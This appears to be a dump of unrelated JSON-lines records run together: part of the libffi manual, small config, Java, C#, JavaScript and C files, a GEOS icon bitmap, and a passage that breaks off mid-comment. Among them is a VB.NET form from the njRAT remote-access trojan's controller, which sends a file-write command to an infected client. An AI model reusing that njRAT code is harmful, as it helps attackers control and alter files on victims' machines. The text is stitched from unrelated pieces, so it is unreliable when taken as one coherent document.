ffi_prep_cif_var\n@defun ffi_status ffi_prep_cif_var (ffi_cif *@var{cif}, ffi_abi var{abi}, unsigned int @var{nfixedargs}, unsigned int var{ntotalargs}, ffi_type *@var{rtype}, ffi_type **@var{argtypes})\nThis initializes @var{cif} according to the given parameters for\na call to a variadic function. In general it's operation is the\nsame as for @code{ffi_prep_cif} except that:\n\n@var{nfixedargs} is the number of fixed arguments, prior to any\nvariadic arguments. It must be greater than zero.\n\n@var{ntotalargs} the total number of arguments, including variadic\nand fixed arguments.\n\nNote that, different cif's must be prepped for calls to the same\nfunction when different numbers of arguments are passed.\n\nAlso note that a call to @code{ffi_prep_cif_var} with\n@var{nfixedargs}=@var{nototalargs} is NOT equivalent to a call to\n@code{ffi_prep_cif}.\n\n@end defun\n\n\nTo call a function using an initialized @code{ffi_cif}, use the\n@code{ffi_call} function:\n\n@findex ffi_call\n@defun void ffi_call (ffi_cif *@var{cif}, void *@var{fn}, void *@var{rvalue}, void **@var{avalues})\nThis calls the function @var{fn} according to the description given in\n@var{cif}. 
@var{cif} must have already been prepared using\n@code{ffi_prep_cif}.\n\n@var{rvalue} is a pointer to a chunk of memory that will hold the\nresult of the function call. This must be large enough to hold the\nresult and must be suitably aligned; it is the caller's responsibility\nto ensure this. If @var{cif} declares that the function returns\n@code{void} (using @code{ffi_type_void}), then @var{rvalue} is\nignored. If @var{rvalue} is @samp{NULL}, then the return value is\ndiscarded.\n\n@var{avalues} is a vector of @code{void *} pointers that point to the\nmemory locations holding the argument values for a call. If @var{cif}\ndeclares that the function has no arguments (i.e., @var{nargs} was 0),\nthen @var{avalues} is ignored. Note that argument values may be\nmodified by the callee (for instance, structs passed by value); the\nburden of copying pass-by-value arguments is placed on the caller.\n@end defun\n\n\n@node Simple Example\n@section Simple Example\n\nHere is a trivial example that calls @code{puts} a few times.\n\n@example\n#include \n#include \n\nint main()\n@{\n ffi_cif cif;\n ffi_type *args[1];\n void *values[1];\n char *s;\n int rc;\n \n /* Initialize the argument info vectors */ \n args[0] = &ffi_type_pointer;\n values[0] = &s;\n \n /* Initialize the cif */\n if (ffi_prep_cif(&cif, FFI_DEFAULT_ABI, 1, \n\t\t &ffi_type_uint, args) == FFI_OK)\n @{\n s = \"Hello World!\";\n ffi_call(&cif, puts, &rc, values);\n /* rc now holds the result of the call to puts */\n \n /* values holds a pointer to the function's arg, so to \n call puts() again all we need to do is change the \n value of s */\n s = \"This is cool!\";\n ffi_call(&cif, puts, &rc, values);\n @}\n \n return 0;\n@}\n@end example\n\n\n@node Types\n@section Types\n\n@menu\n* Primitive Types:: Built-in types.\n* Structures:: Structure types.\n* Type Example:: Structure type example.\n@end menu\n\n@node Primitive Types\n@subsection Primitive Types\n\n@code{Libffi} provides a number of built-in type descriptors that can\nbe used to describe argument and return types:\n\n@table @code\n@item ffi_type_void\n@tindex ffi_type_void\nThe type @code{void}. This cannot be used for argument types, only\nfor return values.\n\n@item ffi_type_uint8\n@tindex ffi_type_uint8\nAn unsigned, 8-bit integer type.\n\n@item ffi_type_sint8\n@tindex ffi_type_sint8\nA signed, 8-bit integer type.\n\n@item ffi_type_uint16\n@tindex ffi_type_uint16\nAn unsigned, 16-bit integer type.\n\n@item ffi_type_sint16\n@tindex ffi_type_sint16\nA signed, 16-bit integer type.\n\n@item ffi_type_uint32\n@tindex ffi_type_uint32\nAn unsigned, 32-bit integer type.\n\n@item ffi_type_sint32\n@tindex ffi_type_sint32\nA signed, 32-bit integer type.\n\n@item ffi_type_uint64\n@tindex ffi_type_uint64\nAn unsigned, 64-bit integer type.\n\n@item ffi_type_sint64\n@tindex ffi_type_sint64\nA signed, 64-bit integer type.\n\n@item ffi_type_float\n@tindex ffi_type_float\nThe C @code{float} type.\n\n@item ffi_type_double\n@tindex ffi_type_double\nThe C @code{double} type.\n\n@item ffi_type_uchar\n@tindex ffi_type_uchar\nThe C @code{unsigned char} type.\n\n@item ffi_type_schar\n@tindex ffi_type_schar\nThe C @code{signed char} type. 
(Note that there is not an exact\nequivalent to the C @code{char} type in @code{libffi}; ordinarily you\nshould either use @code{ffi_type_schar} or @code{ffi_type_uchar}\ndepending on whether @code{char} is signed.)\n\n@item ffi_type_ushort\n@tindex ffi_type_ushort\nThe C @code{unsigned short} type.\n\n@item ffi_type_sshort\n@tindex ffi_type_sshort\nThe C @code{short} type.\n\n@item ffi_type_uint\n@tindex ffi_type_uint\nThe C @code{unsigned int} type.\n\n@item ffi_type_sint\n@tindex ffi_type_sint\nThe C @code{int} type.\n\n@item ffi_type_ulong\n@tindex ffi_type_ulong\nThe C @code{unsigned long} type.\n\n@item ffi_type_slong\n@tindex ffi_type_slong\nThe C @code{long} type.\n\n@item ffi_type_longdouble\n@tindex ffi_type_longdouble\nOn platforms that have a C @code{long double} type, this is defined.\nOn other platforms, it is not.\n\n@item ffi_type_pointer\n@tindex ffi_type_pointer\nA generic @code{void *} pointer. You should use this for all\npointers, regardless of their real type.\n@end table\n\nEach of these is of type @code{ffi_type}, so you must take the address\nwhen passing to @code{ffi_prep_cif}.\n\n\n@node Structures\n@subsection Structures\n\nAlthough @samp{libffi} has no special support for unions or\nbit-fields, it is perfectly happy passing structures back and forth.\nYou must first describe the structure to @samp{libffi} by creating a\nnew @code{ffi_type} object for it.\n\n@tindex ffi_type\n@deftp ffi_type\nThe @code{ffi_type} has the following members:\n@table @code\n@item size_t size\nThis is set by @code{libffi}; you should initialize it to zero.\n\n@item unsigned short alignment\nThis is set by @code{libffi}; you should initialize it to zero.\n\n@item unsigned short type\nFor a structure, this should be set to @code{FFI_TYPE_STRUCT}.\n\n@item ffi_type **elements\nThis is a @samp{NULL}-terminated array of pointers to @code{ffi_type}\nobjects. There is one element per field of the struct.\n@end table\n@end deftp\n\n\n@node Type Example\n@subsection Type Example\n\nThe following example initializes a @code{ffi_type} object\nrepresenting the @code{tm} struct from Linux's @file{time.h}.\n\nHere is how the struct is defined:\n\n@example\nstruct tm @{\n int tm_sec;\n int tm_min;\n int tm_hour;\n int tm_mday;\n int tm_mon;\n int tm_year;\n int tm_wday;\n int tm_yday;\n int tm_isdst;\n /* Those are for future use. */\n long int __tm_gmtoff__;\n __const char *__tm_zone__;\n@};\n@end example\n\nHere is the corresponding code to describe this struct to\n@code{libffi}:\n\n@example\n @{\n ffi_type tm_type;\n ffi_type *tm_type_elements[12];\n int i;\n\n tm_type.size = tm_type.alignment = 0;\n tm_type.elements = &tm_type_elements;\n \n for (i = 0; i < 9; i++)\n tm_type_elements[i] = &ffi_type_sint;\n\n tm_type_elements[9] = &ffi_type_slong;\n tm_type_elements[10] = &ffi_type_pointer;\n tm_type_elements[11] = NULL;\n\n /* tm_type can now be used to represent tm argument types and\n\t return types for ffi_prep_cif() */\n @}\n@end example\n\n\n@node Multiple ABIs\n@section Multiple ABIs\n\nA given platform may provide multiple different ABIs at once. For\ninstance, the x86 platform has both @samp{stdcall} and @samp{fastcall}\nfunctions.\n\n@code{libffi} provides some support for this. 
However, this is\nnecessarily platform-specific.\n\n@c FIXME: document the platforms\n\n@node The Closure API\n@section The Closure API\n\n@code{libffi} also provides a way to write a generic function -- a\nfunction that can accept and decode any combination of arguments.\nThis can be useful when writing an interpreter, or to provide wrappers\nfor arbitrary functions.\n\nThis facility is called the @dfn{closure API}. Closures are not\nsupported on all platforms; you can check the @code{FFI_CLOSURES}\ndefine to determine whether they are supported on the current\nplatform.\n@cindex closures\n@cindex closure API\n@findex FFI_CLOSURES\n\nBecause closures work by assembling a tiny function at runtime, they\nrequire special allocation on platforms that have a non-executable\nheap. Memory management for closures is handled by a pair of\nfunctions:\n\n@findex ffi_closure_alloc\n@defun void *ffi_closure_alloc (size_t @var{size}, void **@var{code})\nAllocate a chunk of memory holding @var{size} bytes. This returns a\npointer to the writable address, and sets *@var{code} to the\ncorresponding executable address.\n\n@var{size} should be sufficient to hold a @code{ffi_closure} object.\n@end defun\n\n@findex ffi_closure_free\n@defun void ffi_closure_free (void *@var{writable})\nFree memory allocated using @code{ffi_closure_alloc}. The argument is\nthe writable address that was returned.\n@end defun\n\n\nOnce you have allocated the memory for a closure, you must construct a\n@code{ffi_cif} describing the function call. Finally you can prepare\nthe closure function:\n\n@findex ffi_prep_closure_loc\n@defun ffi_status ffi_prep_closure_loc (ffi_closure *@var{closure}, ffi_cif *@var{cif}, void (*@var{fun}) (ffi_cif *@var{cif}, void *@var{ret}, void **@var{args}, void *@var{user_data}), void *@var{user_data}, void *@var{codeloc})\nPrepare a closure function.\n\n@var{closure} is the address of a @code{ffi_closure} object; this is\nthe writable address returned by @code{ffi_closure_alloc}.\n\n@var{cif} is the @code{ffi_cif} describing the function parameters.\n\n@var{user_data} is an arbitrary datum that is passed, uninterpreted,\nto your closure function.\n\n@var{codeloc} is the executable address returned by\n@code{ffi_closure_alloc}.\n\n@var{fun} is the function which will be called when the closure is\ninvoked. It is called with the arguments:\n@table @var\n@item cif\nThe @code{ffi_cif} passed to @code{ffi_prep_closure_loc}.\n\n@item ret\nA pointer to the memory used for the function's return value.\n@var{fun} must fill this, unless the function is declared as returning\n@code{void}.\n@c FIXME: is this NULL for void-returning functions?\n\n@item args\nA vector of pointers to memory holding the arguments to the function.\n\n@item user_data\nThe same @var{user_data} that was passed to\n@code{ffi_prep_closure_loc}.\n@end table\n\n@code{ffi_prep_closure_loc} will return @code{FFI_OK} if everything\nwent ok, and something else on error.\n@c FIXME: what?\n\nAfter calling @code{ffi_prep_closure_loc}, you can cast @var{codeloc}\nto the appropriate pointer-to-function type.\n@end defun\n\nYou may see old code referring to @code{ffi_prep_closure}. This\nfunction is deprecated, as it cannot handle the need for separate\nwritable and executable addresses.\n\n@node Closure Example\n@section Closure Example\n\nA trivial example that creates a new @code{puts} by binding \n@code{fputs} with @code{stdin}.\n\n@example\n#include \n#include \n\n/* Acts like puts with the file given at time of enclosure. 
*/\nvoid puts_binding(ffi_cif *cif, unsigned int *ret, void* args[], \n FILE *stream)\n@{\n *ret = fputs(*(char **)args[0], stream);\n@}\n\nint main()\n@{\n ffi_cif cif;\n ffi_type *args[1];\n ffi_closure *closure;\n\n int (*bound_puts)(char *);\n int rc;\n \n /* Allocate closure and bound_puts */\n closure = ffi_closure_alloc(sizeof(ffi_closure), &bound_puts);\n\n if (closure)\n @{\n /* Initialize the argument info vectors */\n args[0] = &ffi_type_pointer;\n\n /* Initialize the cif */\n if (ffi_prep_cif(&cif, FFI_DEFAULT_ABI, 1,\n &ffi_type_uint, args) == FFI_OK)\n @{\n /* Initialize the closure, setting stream to stdout */\n if (ffi_prep_closure_loc(closure, &cif, puts_binding, \n stdout, bound_puts) == FFI_OK)\n @{\n rc = bound_puts(\"Hello World!\");\n /* rc now holds the result of the call to fputs */\n @}\n @}\n @}\n\n /* Deallocate both closure, and bound_puts */\n ffi_closure_free(closure);\n\n return 0;\n@}\n\n@end example\n\n\n@node Missing Features\n@chapter Missing Features\n\n@code{libffi} is missing a few features. We welcome patches to add\nsupport for these.\n\n@itemize @bullet\n@item\nVariadic closures.\n\n@item\nThere is no support for bit fields in structures.\n\n@item\nThe closure API is\n\n@c FIXME: ...\n\n@item\nThe ``raw'' API is undocumented.\n@c argument promotion?\n@c unions?\n@c anything else?\n@end itemize\n\nNote that variadic support is very new and tested on a relatively\nsmall number of platforms.\n\n@node Index\n@unnumbered Index\n\n@printindex cp\n\n@bye\n"} {"text": "module.exports = {\n plugins: {\n autoprefixer: {}\n }\n}\n"} {"text": "Imports Microsoft.VisualBasic.CompilerServices\nImports System\nImports System.ComponentModel\nImports System.Diagnostics\nImports System.Drawing\nImports System.Runtime.CompilerServices\nImports System.Windows.Forms\nImports NJRAT.NJRAT\n\nPublic Class Note\n Public FN As String\n Public SK As Client\n Private Sub ToolStripMenuItem1_Click(sender As Object, e As EventArgs) Handles ToolStripMenuItem1.Click\n Dim strArray As String() = New String(9 - 1) {}\n strArray(0) = \"Ex\"\n strArray(1) = Class7.string_1\n strArray(2) = \"fm\"\n strArray(3) = Class7.string_1\n strArray(4) = \"wr\"\n strArray(5) = Class7.string_1\n strArray(6) = Class6.smethod_14(Me.FN)\n strArray(7) = Class7.string_1\n Dim box As TextBox = Me.TextBox1\n Dim text As String = box.Text\n box.Text = [text]\n strArray(8) = Class6.smethod_14([text])\n Me.SK.Send(String.Concat(strArray))\n Me.ToolStripMenuItem1.Enabled = False\n End Sub\n\n Private Sub TextBox1_TextChanged(sender As Object, e As EventArgs) Handles TextBox1.TextChanged\n Me.ToolStripMenuItem1.Enabled = True\n End Sub\nEnd Class"} {"text": "#!/bin/sh\napt-get install binfmt-support qemu qemu-user-static debootstrap kpartx lvm2 dosfstools apt-cacher-ng\n"} {"text": "/*\n * Sonatype Nexus (TM) Open Source Version\n * Copyright (c) 2008-present Sonatype, Inc.\n * All rights reserved. Includes the third-party code listed at http://links.sonatype.com/products/nexus/oss/attributions.\n *\n * This program and the accompanying materials are made available under the terms of the Eclipse Public License Version 1.0,\n * which accompanies this distribution and is available at http://www.eclipse.org/legal/epl-v10.html.\n *\n * Sonatype Nexus (TM) Professional Version is available from Sonatype, Inc. \"Sonatype\" and \"Sonatype Nexus\" are trademarks\n * of Sonatype, Inc. Apache Maven is a trademark of the Apache Software Foundation. M2eclipse is a trademark of the\n * Eclipse Foundation. 
All other trademarks are the property of their respective owners.\n */\n\n/**\n * Repository view framework.\n *\n * @since 3.0\n */\npackage org.sonatype.nexus.repository.view;"} {"text": "package sample;\n\n/*\n If statement Example\n This Java Example shows how to use if statement in Java program.\n*/\n\npublic class SimpleIfStatementExample {\n\n public static void main(String[] args) {\n\n /*\n * If statement is used to execute an action if particular condition is true.\n * Syntax of if statement is,\n *\n * if()\n * \n *\n * while is a boolean expression, and statement is a valied java\n * statement which will be executed if is true. To use multiple\n * statements, enclose them in a block.\n *\n */\n\n boolean blnStatus = true;\n\n if (blnStatus) System.out.println(\"Status is true\");\n }\n}\n\n/*\n Output would be\n Status is true\n */\n"} {"text": "\"use strict\";\nObject.defineProperty(exports, \"__esModule\", { value: true });\nconst NucleoObject_1 = require(\"./../nucleoTypes/NucleoObject\");\nclass NucleoList {\n constructor(config) {\n this.getListChildrenType = () => {\n // TODO: oh please, improve this shit\n if (this.NucleoObject) {\n return 'NucleoObject';\n }\n return 'NucleoPrimitive';\n };\n if (config instanceof NucleoObject_1.default) {\n this.NucleoObject = config;\n }\n this.NucleoPrimitive = { Type: config.Type, serialize: config.serialize };\n }\n}\nexports.default = NucleoList;\n//# sourceMappingURL=NucleoList.js.map"} {"text": "---\ncurrentMenu: disabled \n---\n\n# Demo: Disabled\n\n\n\n\n\n- [Example code](#example-code)\n- [Example HTML](#example-html)\n\n\nright click me\n\n## Example code\n\n\n\n## Example HTML\n
"} {"text": "# Do not edit. Source files are in /res/country_metadata\nisSlowZoneKnown: true\nmobileCountryCode: 292\nofficialLanguages: [it]\n"} {"text": "namespace MultiLanguage\n{\n using System;\n using System.Runtime.CompilerServices;\n using System.Runtime.InteropServices;\n using System.Security;\n\n [ComImport, InterfaceType((short) 1), Guid(\"F5BE2EE1-BFD7-11D0-B188-00AA0038C969\")]\n public interface IMLangLineBreakConsole\n {\n [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType=MethodCodeType.Runtime)]\n void BreakLineML([In, MarshalAs(UnmanagedType.Interface)] CMLangString pSrcMLStr, [In] int lSrcPos, [In] int lSrcLen, [In] int cMinColumns, [In] int cMaxColumns, out int plLineLen, out int plSkipLen);\n [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType=MethodCodeType.Runtime)]\n void BreakLineW([In] uint locale, [In] ref ushort pszSrc, [In] int cchSrc, [In] int cMaxColumns, out int pcchLine, out int pcchSkip);\n [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType=MethodCodeType.Runtime)]\n void BreakLineA([In] uint locale, [In] uint uCodePage, [In] ref sbyte pszSrc, [In] int cchSrc, [In] int cMaxColumns, out int pcchLine, out int pcchSkip);\n }\n}\n"} {"text": "\n/* Copyright (c) Mark J. Kilgard, 1995. */\n\n/* This program is freely distributable without licensing fees \n and is provided without guarantee or warrantee expressed or \n implied. This program is -not- in the public domain. */\n\n#include \"glutint.h\"\n#include \"glutstroke.h\"\n\n/* CENTRY */\nint APIENTRY \nglutStrokeWidth(GLUTstrokeFont font, int c)\n{\n StrokeFontPtr fontinfo;\n const StrokeCharRec *ch;\n\n#if defined(_WIN32)\n fontinfo = (StrokeFontPtr) __glutFont(font);\n#else\n fontinfo = (StrokeFontPtr) font;\n#endif\n\n if (c < 0 || c >= fontinfo->num_chars)\n return 0;\n ch = &(fontinfo->ch[c]);\n if (ch)\n return ch->right;\n else\n return 0;\n}\n\nint APIENTRY \nglutStrokeLength(GLUTstrokeFont font, const unsigned char *string)\n{\n int c, length;\n StrokeFontPtr fontinfo;\n const StrokeCharRec *ch;\n\n#if defined(_WIN32)\n fontinfo = (StrokeFontPtr) __glutFont(font);\n#else\n fontinfo = (StrokeFontPtr) font;\n#endif\n\n length = 0;\n for (; *string != '\\0'; string++) {\n c = *string;\n if (c >= 0 && c < fontinfo->num_chars) {\n ch = &(fontinfo->ch[c]);\n if (ch)\n length += ch->right;\n }\n }\n return length;\n}\n\n/* ENDCENTRY */\n"} {"text": "/*\r\n * Moniker generated from PCX/deskicon.pcx with pixel 13 masked out\r\n */\r\nstart AppIconAreaSCMonikerResource, data;\r\nvisMoniker DisconnectButtonSCMoniker = {\r\n\tsize = standard;\r\n\tstyle = icon;\r\n\taspectRatio = normal;\r\n\tcolor = color4;\r\n\tcachedSize = 48, 30;\r\n\tgstring {\r\n\t\tGSBeginString\r\n\t\tGSDrawBitmapAtCP 906\r\n\t\tBitmap <48,30,0,BMF_4BIT or mask BMT_MASK>\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 
0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xde, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x80, 0x21, 0x08, 0x02, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0x0d, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xed, 0xdd, 0xde, 0xdd, 0xdd, 0xed, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0d, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xd0, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x00, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x03, 0xc0, 0x11, 0x10, 0x03, 0x80\r\n\tdb\t0xdd, 0xdd, 0xdd, 0x0f, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0x0d, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x07, 0xc0, 0x08, 0x20, 0x03, 0xc0\r\n\tdb\t0xdd, 0xdd, 0xd0, 0xff, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0xf0, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x0f, 0xc0, 0x08, 0x20, 0x03, 0xe0\r\n\tdb\t0xdd, 0xdd, 0x0f, 0xff, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0xff, 0x0d, 0xdd, 0xdd\r\n\tdb\t0x1f, 0xff, 0xc4, 0x4f, 0xff, 0xf0\r\n\tdb\t0xdd, 0xd0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, \r\n\t\t0x00, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0x00, 0x00, \r\n\t\t0x00, 0x00, 0x00, 0x0f, 0xff, 0xf0, 0xdd, 0xdd\r\n\tdb\t0x3f, 0xff, 0xe0, 0x0f, 0xff, 0xf8\r\n\tdb\t0xdd, 0x0f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0d, 0xdd\r\n\tdb\t0x7f, 0xff, 0xe0, 0x0f, 0xff, 0xfc\r\n\tdb\t0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0xdd\r\n\tdb\t0xff, 0xff, 0xe0, 0x0f, 0xff, 0xfe\r\n\tdb\t0x0f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0d\r\n\tdb\t0x7f, 0xff, 0xe0, 0x0f, 0xff, 0xff\r\n\tdb\t0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x88\r\n\tdb\t0x3f, 0xff, 0xe0, 0x0f, 0xff, 0xfe\r\n\tdb\t0xdd, 0x0f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x08, 0x8d\r\n\tdb\t0x1f, 0xff, 0xe0, 0x0f, 0xff, 0xfc\r\n\tdb\t0xdd, 0xd0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, \r\n\t\t0x00, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x00, 0x00, \r\n\t\t0x00, 0x00, 0x00, 0x0f, 0xff, 0xf0, 0x88, 0xdd\r\n\tdb\t0x0f, 0xff, 0xe4, 0x47, 0xff, 0xf8\r\n\tdb\t0xdd, 0xdd, 0x0f, 0xff, 0x08, 0x88, 0x88, 0x88, \r\n\t\t0x88, 0x8d, 0xde, 0xdd, 0xde, 0xdd, 0xd8, 0x88, \r\n\t\t0x88, 0x88, 0x88, 0x0f, 0xff, 0x08, 0x8d, 0xdd\r\n\tdb\t0x07, 0xc0, 0x08, 0x20, 0x03, 0xf0\r\n\tdb\t0xdd, 0xdd, 0xd0, 0xff, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0xf0, 0x88, 0xdd, 0xdd\r\n\tdb\t0x03, 0xc0, 0x08, 0x20, 0x03, 0xe0\r\n\tdb\t0xdd, 0xdd, 0xdd, 0x0f, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0x08, 0x8d, 0xdd, 0xdd\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0xc0\r\n\tdb\t0xdd, 0xdd, 0xdd, 
0xd0, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x00, 0x88, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0xc0, 0x11, 0x10, 0x03, 0x80\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x08, 0x8d, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x40, 0x21, 0x08, 0x01, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xd8, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xed, 0xdd, 0xde, 0xdd, 0xdd, 0xed, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xd8, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xde, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\t\tGSEndString\r\n\t}\r\n}\r\nend AppIconAreaSCMonikerResource;\r\n/*\r\n * 